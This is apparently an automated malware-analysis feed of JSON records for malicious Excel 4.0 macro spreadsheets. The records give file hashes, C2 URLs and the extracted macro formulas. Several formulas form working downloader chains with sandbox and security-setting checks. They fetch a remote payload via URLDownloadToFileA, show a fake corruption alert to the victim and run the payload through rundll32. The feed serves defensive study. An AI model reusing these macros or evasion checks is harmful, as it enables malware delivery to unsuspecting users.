{"version":"0.2","sample":{"sample":"","kind":"file","target":"36333f133f4e9e8ab68ce5bd6888c430aa26690f350b20b33a0f313082df1003"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"36333f133f4e9e8ab68ce5bd6888c430aa26690f350b20b33a0f313082df1003","filesize":141824,"md5":"b5a64d9a4d87d04433c6245089a1fc9d","sha1":"73b6ee6b850581897871e70a127a800559c2fa28","sha256":"36333f133f4e9e8ab68ce5bd6888c430aa26690f350b20b33a0f313082df1003","sha512":"baf7b9f8606dec5a80ec6de160e40069248082afa389d6b35aaf9a40c01f8b66f34ce56df116ed618ec072779bce08c09eea69d3c100fee191cbb7d398211f74","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"36333f133f4e9e8ab68ce5bd6888c430aa26690f350b20b33a0f313082df1003.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"xDsMmUxU32\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3642368f8597ec6c659950c403fb2afa2b7d07aa5f0024fc216e44f31251dda1"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3642368f8597ec6c659950c403fb2afa2b7d07aa5f0024fc216e44f31251dda1","filesize":116224,"md5":"c00fb362006aaec91ab13bf04e3a9920","sha1":"dd99b225d678e0aaf0749e6dbbd80f87a9bc853f","sha256":"3642368f8597ec6c659950c403fb2afa2b7d07aa5f0024fc216e44f31251dda1","sha512":"50c95cf8ba3395ce1df09f530faaa560cb6d3a12d554ff881b2c5fe9679a0c4a8037c7ced3fd73d4bfcb886ba0db5a97894a7266952706492a017f1849357041","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3642368f8597ec6c659950c403fb2afa2b7d07aa5f0024fc216e44f31251dda1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ksbyLkOIA6\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3655ea3bab113f9bc1ed61a89edcbe1894f634c85bcaf54617ee3331e9193508"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3655ea3bab113f9bc1ed61a89edcbe1894f634c85bcaf54617ee3331e9193508","filesize":209920,"md5":"aa28ed7377182eb93a872864f3317caf","sha1":"6cdb4469b7b7fe24c9e48c9227dfc9f6f851a34d","sha256":"3655ea3bab113f9bc1ed61a89edcbe1894f634c85bcaf54617ee3331e9193508","sha512":"8ee5681d10c47a7de77d1c0253ba07dee782327799bbb6e7cb9a0f8423cc17568a18185d7fb1e8a2fb9ba4c7775390ab16bda7e53272a26ff670075c56d356cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3655ea3bab113f9bc1ed61a89edcbe1894f634c85bcaf54617ee3331e9193508.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8GiVv39AYl\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3667d4a79c1be1fac6b27694232b3aca3ca33b256e146ab48eee24984eae8025"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3667d4a79c1be1fac6b27694232b3aca3ca33b256e146ab48eee24984eae8025","filesize":167936,"md5":"d91115c1bbe91599961ef5c7b3bf2039","sha1":"89436a43870ccb14e3deab657a0d81164a215d26","sha256":"3667d4a79c1be1fac6b27694232b3aca3ca33b256e146ab48eee24984eae8025","sha512":"b6833d5b7cea22f672df726fe2e01ebf13d54dd6b40bbdfed3d08236d7b0ce7022941b283f120e05d1131e5ed8068dfefc130cbec7006308fe585c07588c3c18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3667d4a79c1be1fac6b27694232b3aca3ca33b256e146ab48eee24984eae8025.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ovhJDx9STW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"366b09f8c9bf5d2bc7f8277ce77450c0269482d99c7900108a47e78283f6d37c"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"366b09f8c9bf5d2bc7f8277ce77450c0269482d99c7900108a47e78283f6d37c","filesize":185344,"md5":"33cf000cf2d809c8574d161c731651e8","sha1":"168636b6bfca14a9cc936d09ce9f9dbd8983267c","sha256":"366b09f8c9bf5d2bc7f8277ce77450c0269482d99c7900108a47e78283f6d37c","sha512":"1ed51aa056d637b988af4dbe1bc4891e88c96d50961136b51f19aaca6fbffe6cd31a4b38b426bc0bedf24ad9439ff84c63a7e9e7c630329f96b96dc626b20520","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"366b09f8c9bf5d2bc7f8277ce77450c0269482d99c7900108a47e78283f6d37c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"36783e8f915aef987a9a6b3d064784faee19718ba0af857540441553e7ba3e5f"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"36783e8f915aef987a9a6b3d064784faee19718ba0af857540441553e7ba3e5f","filesize":185344,"md5":"fda5b9547a90a334a340d3370a381302","sha1":"f485424dd51a7c814d53cf0cf19f8041315338c0","sha256":"36783e8f915aef987a9a6b3d064784faee19718ba0af857540441553e7ba3e5f","sha512":"a7d84805bd2ba4478cdee7cefc00c450ecb010a4645d9ad330fe420ed06ce3364ccfa75fdb8f20815a8fa53c611c5389f843b9228ad924c3481c936a563a9bd8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"36783e8f915aef987a9a6b3d064784faee19718ba0af857540441553e7ba3e5f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"368832e045934f6b7a3e3b640a6998b227dc9689d6a4a18ee67bdaa36a825160"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"368832e045934f6b7a3e3b640a6998b227dc9689d6a4a18ee67bdaa36a825160","filesize":185344,"md5":"c8af343c38b188f3b891788acb84d36e","sha1":"05b7bd7c8ca5777023589883cdab107fea112261","sha256":"368832e045934f6b7a3e3b640a6998b227dc9689d6a4a18ee67bdaa36a825160","sha512":"77908f32c3814cb4bb03b440bbb7e2588ff94def050e43921c2dec85e56d7f7615479dac6dcf5634ae605d28c6e3993f088977ad6130420dc3794bb2e8b22d6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"368832e045934f6b7a3e3b640a6998b227dc9689d6a4a18ee67bdaa36a825160.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"368bb4bc851d3a3ab6a712b4f87d3520a64c3f2952dd9508acf2846f4bc3590c"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"368bb4bc851d3a3ab6a712b4f87d3520a64c3f2952dd9508acf2846f4bc3590c","filesize":168960,"md5":"ec00bf54f5bae4cd8d7a06027af396f0","sha1":"27835eb0b1bac2127cbd206e4a3c970d99f80aa5","sha256":"368bb4bc851d3a3ab6a712b4f87d3520a64c3f2952dd9508acf2846f4bc3590c","sha512":"dd2ee4f42b469a7a390752f6ca1b73e9b94a2f4aade50ef85301093a1598e582eeb48fca74942ae623caf1daa0d229c8275eb82970f7373331e711a823e48d45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"368bb4bc851d3a3ab6a712b4f87d3520a64c3f2952dd9508acf2846f4bc3590c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8O9pyHvkxP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"36ae1c57d69013364278b9632158b13300729ac388c1466f14410c6d05d50fed"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"36ae1c57d69013364278b9632158b13300729ac388c1466f14410c6d05d50fed","filesize":142848,"md5":"e2471fc7fc9585ac6c9e9ccee9d9b217","sha1":"60ddd5ba1b4dd2c8eceabe19e2f3656a1e7b3ed0","sha256":"36ae1c57d69013364278b9632158b13300729ac388c1466f14410c6d05d50fed","sha512":"845139e3b50774d6edc1083b2f3a7399dbc69fb5bd6ed2bdbc100e3fb6d9d55718a49c3119ecde34fa30baedd1a1626ac3459827563eb31008d7f53af4c3847d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"36ae1c57d69013364278b9632158b13300729ac388c1466f14410c6d05d50fed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"AcDS7sgnjC\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"36bc2d5cab2d3df8470663cfacc19c394dec359fa1df6ac51173b4db4060e137"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"36bc2d5cab2d3df8470663cfacc19c394dec359fa1df6ac51173b4db4060e137","filesize":185344,"md5":"403715f85079a1fae3e4a6bde5d3783b","sha1":"c868b6654213f16c4f9be9c4e63d4eb02365441c","sha256":"36bc2d5cab2d3df8470663cfacc19c394dec359fa1df6ac51173b4db4060e137","sha512":"9afa33d5d0aa3464ebc746d7fdc851bf276b32afddb72add977113a0109bd99be0b8f633cbe9e4f543329537386632f51606840c9b05edadca4f5beeafb23058","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"36bc2d5cab2d3df8470663cfacc19c394dec359fa1df6ac51173b4db4060e137.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"36c2e2d3ef6863105a2476da88a020f6846f64779806e500f0137a4f31401bb9"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"36c2e2d3ef6863105a2476da88a020f6846f64779806e500f0137a4f31401bb9","filesize":144384,"md5":"7e743085e457b7627ba1870c33018d7b","sha1":"572cf2ed13a5bb21e7ec4eebecdb821eefd4176f","sha256":"36c2e2d3ef6863105a2476da88a020f6846f64779806e500f0137a4f31401bb9","sha512":"ba53a709c6f310065cec8ef75ebb4c4a7b141093bc47aba7f78080c185d9de0364e8329fd1105394e13345889492d237d68bb2af08b4a447f20ba41a6e23cc0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"36c2e2d3ef6863105a2476da88a020f6846f64779806e500f0137a4f31401bb9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"sBtzZQGus5\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37413570e81f99bfa6d98c90e7c48e82219b5382c75b57c8fa147dacc10dafc1"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37413570e81f99bfa6d98c90e7c48e82219b5382c75b57c8fa147dacc10dafc1","filesize":206336,"md5":"ca829025f093f58f5280f4fcac641953","sha1":"62a3c1da8051776636bdccfcab36ee2adc3fd655","sha256":"37413570e81f99bfa6d98c90e7c48e82219b5382c75b57c8fa147dacc10dafc1","sha512":"9004fa3d85dc5fc560254bb00e240266cf225ebb6267111f6a86a5d7d3c1158656aca43919f9726a54429d569958646206ceddaee9f7a88ce97b7cfdcf8b2673","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37413570e81f99bfa6d98c90e7c48e82219b5382c75b57c8fa147dacc10dafc1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"khDcd2DQYW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3746f84ad2f56c4ee181995f2b909ab36eabd5e666cb3f4c6067784c1a9b5c0d"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"3746f84ad2f56c4ee181995f2b909ab36eabd5e666cb3f4c6067784c1a9b5c0d","filesize":225280,"md5":"93a2751a8d1631747577c312f39bd778","sha1":"5899356492d8ac28fc60aa4445d4f7e08f042bb5","sha256":"3746f84ad2f56c4ee181995f2b909ab36eabd5e666cb3f4c6067784c1a9b5c0d","sha512":"a4e6c488de7ee2fb0270052c6a608cc762ce7d7de44e19af84fd4951cf121097775966b454d0eb48ac2d8ea01911c0b9e4f04eacf4dd357860451615e7f6a196","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3746f84ad2f56c4ee181995f2b909ab36eabd5e666cb3f4c6067784c1a9b5c0d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3y53hdZLox\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3758393a9ca119ee25af1e042610f382bd28ab512105e5150bccefbff880ea35"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"3758393a9ca119ee25af1e042610f382bd28ab512105e5150bccefbff880ea35","filesize":209920,"md5":"57781b80c52c05cdcd8de6222f4f9c7c","sha1":"7465f7b76230db71f463e347867e058e38fd924d","sha256":"3758393a9ca119ee25af1e042610f382bd28ab512105e5150bccefbff880ea35","sha512":"9224e883f271fb863cc0cf092002393b69783210abc20eac4916f7733c9d1fd90d1348242d25849ac8c6bcb49cbaa33762a9bc3b63d278db3ea541e4744ff03e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3758393a9ca119ee25af1e042610f382bd28ab512105e5150bccefbff880ea35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CDrzcxM3Oc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"375c41e8a3eaecfebbf633d944593de799839e150c50be2a0f428628f924c86b"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"375c41e8a3eaecfebbf633d944593de799839e150c50be2a0f428628f924c86b","filesize":104448,"md5":"05f2bac49a29226cd30c279f833922df","sha1":"e5c7d26c6604be31078d0ef7c1fd4800e81ccecf","sha256":"375c41e8a3eaecfebbf633d944593de799839e150c50be2a0f428628f924c86b","sha512":"768210d66f0a7b2ea00721d1d5ce24a270519d9f6da36373c23f4da41cd87a1a3473749b5bccbf8a4b664b61e4e782f21b6fc8225afb980f7aa26627e82b0e41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"375c41e8a3eaecfebbf633d944593de799839e150c50be2a0f428628f924c86b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"JdiapLuHL0\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37608533ff9f5265fcec050f7226a12008ef1f1f188574df5ad3ed5668b4100d"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37608533ff9f5265fcec050f7226a12008ef1f1f188574df5ad3ed5668b4100d","filesize":167936,"md5":"31cbad379ab0190788351a493ed055f4","sha1":"bd5940e829f83c8c5292871978f6b99da0c7b453","sha256":"37608533ff9f5265fcec050f7226a12008ef1f1f188574df5ad3ed5668b4100d","sha512":"5aa29360c7f56b9c49c0d64c97cdd4d8e16d35eba2e8d0eaab195b1c4530c83d930015bd9caf421ff37a960f31f0211be97d6dd5ea5ac0f7b5e108742ac44a41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37608533ff9f5265fcec050f7226a12008ef1f1f188574df5ad3ed5668b4100d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YztDFcR1lc\",TRUE)\nGOTO(R$0C$19)"}}}]}
